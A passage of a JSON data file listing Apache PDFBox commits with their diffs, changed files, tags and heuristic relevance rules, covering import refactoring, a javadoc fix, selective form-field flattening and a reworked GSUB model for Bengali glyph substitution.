+ " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationStrikeout;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "index 2da253417..840c1d538 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationUnderline;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "index b8dcb585e..03218edb2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "@@ -39,3 +39,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationWidget;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceCharacteristicsDictionary;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", + "index 0ad7db323..d3e6e44e6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", + "@@ -38,3 +38,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "index aeca90d60..0fa2d5ee6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "@@ -21,3 +21,3 @@ import java.util.List;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.form.PlainText.Line;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDDefaultAppearanceString.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "2b4f2bd5014d4e064efc7da267aae4717fd2e19a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528223680, + "hunks": 1, + "message": "PDFBOX-4237: fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832960 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "index 7dc5b144e..91edf6246 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java", + "@@ -55,3 +55,3 @@ public class PDFStreamParser extends BaseParser", + " *", + "- * @param contentStream The content stream to parse.", + "+ * @param stream The content stream to parse.", + " * @throws IOException If there is an error initializing the stream." + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/PDFStreamParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4237": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4237", + "relevance": 2 + } + ] + }, + { + "commit_id": "72ec17d71c526a8c8053a4262ecf6c56249ceaab", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523433953, + "hunks": 6, + "message": "PDFBOX-3809: support flatten for specific fields only; current limitation is that the widget annotation must have a page reference git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828871 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "index 9735402c4..e715bb9a4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "@@ -273,2 +273,4 @@ public final class PDAcroForm implements COSObjectable", + "+ Map> pagesWidgetsMap = buildPagesWidgetsMap(fields);", + "+ ", + " // preserve all non widget annotations", + "@@ -276,2 +278,3 @@ public final class PDAcroForm implements COSObjectable", + " {", + "+ Map widgetsForPageMap = pagesWidgetsMap.get(page.getCOSObject());", + " isContentStreamWrapped = false;", + "@@ -279,6 +282,6 @@ public final class PDAcroForm implements COSObjectable", + " List annotations = new ArrayList<>();", + "- ", + "+ ", + " for (PDAnnotation annotation: page.getAnnotations())", + "- {", + "- if (!(annotation instanceof PDAnnotationWidget))", + "+ { ", + "+ if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)", + " {", + "@@ -352,3 +355,3 @@ public final class PDAcroForm implements COSObjectable", + " // remove the fields", + "- setFields(Collections.emptyList());", + "+ removeFields(fields);", + "@@ -767,2 +770,69 @@ public final class PDAcroForm implements COSObjectable", + "+ private Map> buildPagesWidgetsMap(List fields)", + "+ {", + "+ Map> pagesAnnotationsMap = new HashMap<>();", + "+ boolean hasMissingPageRef = false;", + "+ ", + "+ for (PDField field : fields)", + "+ {", + "+ List widgets = field.getWidgets();", + "+ for (PDAnnotationWidget widget : widgets)", + "+ {", + "+ PDPage pageForWidget = widget.getPage();", + "+ if (pageForWidget != null)", + "+ {", + "+ if (pagesAnnotationsMap.get(pageForWidget.getCOSObject()) == null)", + "+ {", + "+ Map widgetsForPage = new HashMap<>();", + "+ widgetsForPage.put(widget.getCOSObject(), widget);", + "+ pagesAnnotationsMap.put(pageForWidget.getCOSObject(), widgetsForPage);", + "+ }", + "+ else", + "+ {", + "+ Map widgetsForPage = pagesAnnotationsMap.get(pageForWidget.getCOSObject());", + "+ widgetsForPage.put(widget.getCOSObject(), widget);", + "+ }", + "+ }", + "+ else", + "+ {", + "+ hasMissingPageRef = true;", + "+ }", + "+ }", + "+ }", + "+ ", + "+ // TODO: if there is a widget with a missing page reference ", + "+ // we'd need to build the map reverse i.e. form the annotations to the ", + "+ // widget. But this will be much slower so will be omitted for now.", + "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", + "+ ", + "+ return pagesAnnotationsMap;", + "+ }", + "+ ", + "+ private void removeFields(List fields)", + "+ {", + "+ for (PDField field : fields) {", + "+ if (field.getParent() == null)", + "+ {", + "+ COSArray cosFields = (COSArray) dictionary.getDictionaryObject(COSName.FIELDS);", + "+ for (int i=0; i, Integer>> rawGSubData;", + "+ private GsubData gsubData;", + "@@ -105,5 +106,4 @@ public class GlyphSubstitutionTable extends TTFTable", + "- rawGSubData = glyphSubstitutionDataExtractor", + "+ gsubData = glyphSubstitutionDataExtractor", + " .getGsubData(scriptList, featureListTable, lookupListTable);", + "- LOG.debug(\"rawGSubData: \" + rawGSubData);", + " }", + "@@ -672,5 +672,5 @@ public class GlyphSubstitutionTable extends TTFTable", + "- public Map, Integer>> getRawGSubData()", + "+ public GsubData getGsubData()", + " {", + "- return rawGSubData;", + "+ return gsubData;", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "index 8edcc6188..948c13674 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "@@ -29,4 +29,2 @@ import java.util.List;", + " import java.util.Map;", + "-import org.apache.fontbox.FontBoxFont;", + "-import org.apache.fontbox.util.BoundingBox;", + "@@ -34,2 +32,5 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.FontBoxFont;", + "+import org.apache.fontbox.ttf.model.GsubData;", + "+import org.apache.fontbox.util.BoundingBox;", + "@@ -656,3 +657,3 @@ public class TrueTypeFont implements FontBoxFont, Closeable", + "- public Map, Integer>> getGlyphSubstitutionMap() throws IOException", + "+ public GsubData getGsubData() throws IOException", + " {", + "@@ -661,6 +662,6 @@ public class TrueTypeFont implements FontBoxFont, Closeable", + " {", + "- return Collections.emptyMap();", + "+ return GsubData.NO_DATA_FOUND;", + " }", + "- return table.getRawGSubData();", + "+ return table.getGsubData();", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "index 7fb2c0eea..6eaec7b02 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "@@ -28,2 +28,5 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.model.GsubData;", + "+import org.apache.fontbox.ttf.model.Language;", + "+import org.apache.fontbox.ttf.model.MapBackedGsubData;", + " import org.apache.fontbox.ttf.table.common.CoverageTable;", + "@@ -54,5 +57,3 @@ public class GlyphSubstitutionDataExtractor", + "- private static final String[] SUPPORTED_LANGUAGES = { \"bng2\", \"beng\" };", + "-", + "- public Map, Integer>> getGsubData(Map scriptList,", + "+ public GsubData getGsubData(Map scriptList,", + " FeatureListTable featureListTable, LookupListTable lookupListTable)", + "@@ -60,9 +61,11 @@ public class GlyphSubstitutionDataExtractor", + "- ScriptTable scriptTable = getSupportedLanguage(scriptList);", + "+ ScriptTableDetails scriptTableDetails = getSupportedLanguage(scriptList);", + "- if (scriptTable == null)", + "+ if (scriptTableDetails == null)", + " {", + "- return Collections.emptyMap();", + "+ return GsubData.NO_DATA_FOUND;", + " }", + "+ ScriptTable scriptTable = scriptTableDetails.getScriptTable();", + "+", + " Map, Integer>> gsubData = new LinkedHashMap<>();", + "@@ -78,12 +81,17 @@ public class GlyphSubstitutionDataExtractor", + " }", + "- return Collections.unmodifiableMap(gsubData);", + "+", + "+ return new MapBackedGsubData(scriptTableDetails.getLanguage(),", + "+ scriptTableDetails.getFeatureName(), gsubData);", + " }", + "- private ScriptTable getSupportedLanguage(Map scriptList)", + "+ private ScriptTableDetails getSupportedLanguage(Map scriptList)", + " {", + "- for (String supportedLanguage : SUPPORTED_LANGUAGES)", + "+ for (Language lang : Language.values())", + " {", + "- if (scriptList.containsKey(supportedLanguage))", + "+ for (String scriptName : lang.getScriptNames())", + " {", + "- return scriptList.get(supportedLanguage);", + "+ if (scriptList.containsKey(scriptName))", + "+ {", + "+ return new ScriptTableDetails(lang, scriptName, scriptList.get(scriptName));", + "+ }", + " }", + "@@ -234,2 +242,32 @@ public class GlyphSubstitutionDataExtractor", + "+ private static class ScriptTableDetails", + "+ {", + "+ private final Language language;", + "+ private final String featureName;", + "+ private final ScriptTable scriptTable;", + "+", + "+ private ScriptTableDetails(Language language, String featureName, ScriptTable scriptTable)", + "+ {", + "+ this.language = language;", + "+ this.featureName = featureName;", + "+ this.scriptTable = scriptTable;", + "+ }", + "+", + "+ public Language getLanguage()", + "+ {", + "+ return language;", + "+ }", + "+", + "+ public String getFeatureName()", + "+ {", + "+ return featureName;", + "+ }", + "+", + "+ public ScriptTable getScriptTable()", + "+ {", + "+ return scriptTable;", + "+ }", + "+", + "+ }", + "+", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "index 8e3287ed7..23060ed51 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "@@ -30,5 +30,8 @@ public interface GsubWorker", + " {", + "- List substituteGlyphs(List originalGlyphIds);", + "-", + "- List repositionGlyphs(List originalGlyphIds);", + "+ /**", + "+ * Applies language-specific transforms including GSUB and any other pre or post-processing necessary for displaying", + "+ * Glyphs correctly.", + "+ * ", + "+ */", + "+ List applyTransforms(List originalGlyphIds);", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", + "new file mode 100644", + "index 000000000..872ccfd9a", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", + "@@ -0,0 +1,46 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import org.apache.fontbox.ttf.CmapLookup;", + "+import org.apache.fontbox.ttf.model.GsubData;", + "+import org.apache.fontbox.ttf.model.Language;", + "+", + "+/**", + "+ * Gets a {@link Language} specific instance of a {@link GsubWorker}", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class GsubWorkerFactory", + "+{", + "+", + "+ public GsubWorker getGsubWorker(CmapLookup cmapLookup, GsubData gsubData)", + "+ {", + "+ switch (gsubData.getLanguage())", + "+ {", + "+ case BENGALI:", + "+ return new GsubWorkerForBengali(cmapLookup, gsubData);", + "+ default:", + "+ throw new UnsupportedOperationException(", + "+ \"The language \" + gsubData.getLanguage() + \" is not yet supported\");", + "+ }", + "+", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "index d44ba3a50..7c9feaefb 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "@@ -22,2 +22,3 @@ import java.util.Arrays;", + " import java.util.Collections;", + "+import java.util.HashMap;", + " import java.util.List;", + "@@ -28,2 +29,4 @@ import org.apache.commons.logging.LogFactory;", + " import org.apache.fontbox.ttf.CmapLookup;", + "+import org.apache.fontbox.ttf.model.GsubData;", + "+import org.apache.fontbox.ttf.model.ScriptFeature;", + "@@ -41,2 +44,4 @@ public class GsubWorkerForBengali implements GsubWorker", + "+ private static final String INIT_FEATURE = \"init\";", + "+", + " /**", + "@@ -46,16 +51,23 @@ public class GsubWorkerForBengali implements GsubWorker", + " private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", + "- \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", \"init\", \"pres\", \"abvs\", \"blws\", \"psts\",", + "- \"haln\", \"calt\");", + "+ \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", + "+ \"psts\", \"haln\", \"calt\");", + " private static final char[] BEFORE_HALF_CHARS = new char[] { '\\u09BF', '\\u09C7', '\\u09C8' };", + "+ private static final BeforeAndAfterSpanComponent[] BEFORE_AND_AFTER_SPAN_CHARS = new BeforeAndAfterSpanComponent[] {", + "+ new BeforeAndAfterSpanComponent('\\u09CB', '\\u09C7', '\\u09BE'),", + "+ new BeforeAndAfterSpanComponent('\\u09CC', '\\u09C7', '\\u09D7') };", + "- private final Map, Integer>> glyphSubstitutionMap;", + "+ private final CmapLookup cmapLookup;", + "+ private final GsubData gsubData;", + " private final List beforeHalfGlyphIds;", + "+ private final Map beforeAndAfterSpanGlyphIds;", + "+", + "- public GsubWorkerForBengali(CmapLookup cmapLookup,", + "- Map, Integer>> glyphSubstitutionMap)", + "+ GsubWorkerForBengali(CmapLookup cmapLookup, GsubData gsubData)", + " {", + "- this.glyphSubstitutionMap = glyphSubstitutionMap;", + "- beforeHalfGlyphIds = getBeforeHalfGlyphIds(cmapLookup);", + "+ this.cmapLookup = cmapLookup;", + "+ this.gsubData = gsubData;", + "+ beforeHalfGlyphIds = getBeforeHalfGlyphIds();", + "+ beforeAndAfterSpanGlyphIds = getBeforeAndAfterSpanGlyphIds();", + " }", + "@@ -63,3 +75,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " @Override", + "- public List substituteGlyphs(List originalGlyphIds)", + "+ public List applyTransforms(List originalGlyphIds)", + " {", + "@@ -69,3 +81,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " {", + "- if (!glyphSubstitutionMap.containsKey(feature))", + "+ if (!gsubData.isFeatureSupported(feature))", + " {", + "@@ -77,12 +89,19 @@ public class GsubWorkerForBengali implements GsubWorker", + "- Map, Integer> featureMap = glyphSubstitutionMap.get(feature);", + "+ ScriptFeature scriptFeature = gsubData.getFeature(feature);", + "- intermediateGlyphsFromGsub = applyGsubFeature(featureMap, intermediateGlyphsFromGsub);", + "+ intermediateGlyphsFromGsub = applyGsubFeature(scriptFeature,", + "+ intermediateGlyphsFromGsub);", + " }", + "- return intermediateGlyphsFromGsub;", + "+ return Collections.unmodifiableList(repositionGlyphs(intermediateGlyphsFromGsub));", + " }", + "- @Override", + "- public List repositionGlyphs(List originalGlyphIds)", + "+ private List repositionGlyphs(List originalGlyphIds)", + "+ {", + "+ List glyphsRepositionedByBeforeHalf = repositionBeforeHalfGlyphIds(", + "+ originalGlyphIds);", + "+ return repositionBeforeAndAfterSpanGlyphIds(glyphsRepositionedByBeforeHalf);", + "+ }", + "+", + "+ private List repositionBeforeHalfGlyphIds(List originalGlyphIds)", + " {", + "@@ -103,3 +122,25 @@ public class GsubWorkerForBengali implements GsubWorker", + "- private List applyGsubFeature(Map, Integer> featureMap,", + "+ private List repositionBeforeAndAfterSpanGlyphIds(List originalGlyphIds)", + "+ {", + "+ List repositionedGlyphIds = new ArrayList<>(originalGlyphIds);", + "+", + "+ for (int index = 1; index < originalGlyphIds.size(); index++)", + "+ {", + "+ int glyphId = originalGlyphIds.get(index);", + "+ if (beforeAndAfterSpanGlyphIds.containsKey(glyphId))", + "+ {", + "+ BeforeAndAfterSpanComponent beforeAndAfterSpanComponent = beforeAndAfterSpanGlyphIds", + "+ .get(glyphId);", + "+ int previousGlyphId = originalGlyphIds.get(index - 1);", + "+ repositionedGlyphIds.set(index, previousGlyphId);", + "+ repositionedGlyphIds.set(index - 1,", + "+ getGlyphId(beforeAndAfterSpanComponent.beforeComponentCharacter));", + "+ repositionedGlyphIds.add(index + 1,", + "+ getGlyphId(beforeAndAfterSpanComponent.afterComponentCharacter));", + "+ }", + "+ }", + "+ return repositionedGlyphIds;", + "+ }", + "+", + "+ private List applyGsubFeature(ScriptFeature scriptFeature,", + " List originalGlyphs)", + "@@ -108,3 +149,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " GlyphArraySplitter glyphArraySplitter = new GlyphArraySplitterRegexImpl(", + "- featureMap.keySet());", + "+ scriptFeature.getAllGlyphIdsForSubstitution());", + "@@ -116,6 +157,6 @@ public class GsubWorkerForBengali implements GsubWorker", + " {", + "- if (featureMap.containsKey(chunk))", + "+ if (scriptFeature.canReplaceGlyphs(chunk))", + " {", + " // gsub system kicks in, you get the glyphId directly", + "- int glyphId = featureMap.get(chunk);", + "+ int glyphId = scriptFeature.getReplacementForGlyphs(chunk);", + " gsubProcessedGlyphs.add(glyphId);", + "@@ -134,12 +175,63 @@ public class GsubWorkerForBengali implements GsubWorker", + "- private static List getBeforeHalfGlyphIds(CmapLookup cmapLookup)", + "+ private List getBeforeHalfGlyphIds()", + " {", + "- List beforeHalfGlyphIds = new ArrayList<>();", + "+ List glyphIds = new ArrayList<>();", + "- for (char beforeHalfChar : BEFORE_HALF_CHARS)", + "+ for (char character : BEFORE_HALF_CHARS)", + " {", + "- beforeHalfGlyphIds.add(cmapLookup.getGlyphId(beforeHalfChar));", + "+ glyphIds.add(getGlyphId(character));", + " }", + "- return Collections.unmodifiableList(beforeHalfGlyphIds);", + "+ if (gsubData.isFeatureSupported(INIT_FEATURE))", + "+ {", + "+ ScriptFeature feature = gsubData.getFeature(INIT_FEATURE);", + "+ for (List glyphCluster : feature.getAllGlyphIdsForSubstitution())", + "+ {", + "+ glyphIds.add(feature.getReplacementForGlyphs(glyphCluster));", + "+ }", + "+ }", + "+", + "+ return Collections.unmodifiableList(glyphIds);", + "+", + "+ }", + "+", + "+ private Integer getGlyphId(char character)", + "+ {", + "+ return cmapLookup.getGlyphId(character);", + "+ }", + "+", + "+ private Map getBeforeAndAfterSpanGlyphIds()", + "+ {", + "+ Map beforeAndAfterSpanGlyphIds = new HashMap<>();", + "+", + "+ for (BeforeAndAfterSpanComponent beforeAndAfterSpanComponent : BEFORE_AND_AFTER_SPAN_CHARS)", + "+ {", + "+ beforeAndAfterSpanGlyphIds.put(", + "+ getGlyphId(beforeAndAfterSpanComponent.originalCharacter),", + "+ beforeAndAfterSpanComponent);", + "+ }", + "+", + "+ return Collections.unmodifiableMap(beforeAndAfterSpanGlyphIds);", + "+ }", + "+", + "+ /**", + "+ * Models characters like O-kar (\\u09CB) and OU-kar (\\u09CC). Since these 2 characters is", + "+ * represented by 2 components, one before and one after the Vyanjan Varna on which this is", + "+ * used, this glyph has to be replaced by these 2 glyphs. For O-kar, it has to be replaced by", + "+ * E-kar (\\u09C7) and AA-kar (\\u09BE). For OU-kar, it has be replaced by E-kar (\\u09C7) and", + "+ * \\u09D7.", + "+ *", + "+ */", + "+ private static class BeforeAndAfterSpanComponent {", + "+ private final char originalCharacter;", + "+ private final char beforeComponentCharacter;", + "+ private final char afterComponentCharacter;", + "+", + "+ BeforeAndAfterSpanComponent(char originalCharacter, char beforeComponentCharacter,", + "+ char afterComponentCharacter)", + "+ {", + "+ this.originalCharacter = originalCharacter;", + "+ this.beforeComponentCharacter = beforeComponentCharacter;", + "+ this.afterComponentCharacter = afterComponentCharacter;", + "+ }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", + "new file mode 100644", + "index 000000000..425d14b80", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", + "@@ -0,0 +1,83 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.model;", + "+", + "+import java.util.Set;", + "+", + "+/**", + "+ * Model for data from the GSUB tables", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public interface GsubData", + "+{", + "+ /**", + "+ * To be used when there is no GSUB data available", + "+ */", + "+ GsubData NO_DATA_FOUND = new GsubData()", + "+ {", + "+", + "+ @Override", + "+ public boolean isFeatureSupported(String featureName)", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ @Override", + "+ public Language getLanguage()", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ @Override", + "+ public ScriptFeature getFeature(String featureName)", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ @Override", + "+ public String getActiveScriptName()", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ @Override", + "+ public Set getSupportedFeatures()", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+ };", + "+", + "+ Language getLanguage();", + "+", + "+ /**", + "+ * A {@link Language} can have more than one script that is supported. However, at any given", + "+ * point, only one of the many scripts are active.", + "+ *", + "+ * @return The name of the script that 